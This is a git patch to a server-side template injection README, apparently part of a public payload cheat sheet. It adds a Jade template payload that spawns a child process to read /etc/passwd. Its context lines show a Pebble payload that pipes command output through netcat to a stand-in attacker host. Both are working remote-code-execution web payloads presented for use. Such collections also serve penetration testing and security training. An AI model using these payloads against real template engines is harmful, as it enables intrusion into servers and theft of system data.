From ed944a95af01500df47507fadc91d249e31838b1 Mon Sep 17 00:00:00 2001
From: akoul02 <36170608+akoul02@users.noreply.github.com>
Date: Sat, 31 Oct 2020 18:02:29 +0300
Subject: [PATCH] Improved Jade payload

---
 Server Side Template Injection/README.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 4e3be42..e8ad1da 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -291,6 +291,10 @@ New version of Pebble :
 = x.exec('id | nc attacker.net 80')
 ```
 
+```javascript
+#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
+```
+
 ## Velocity
 
 ```python
@@ -554,4 +558,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
 * [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
 * [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
\ No newline at end of file
+* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)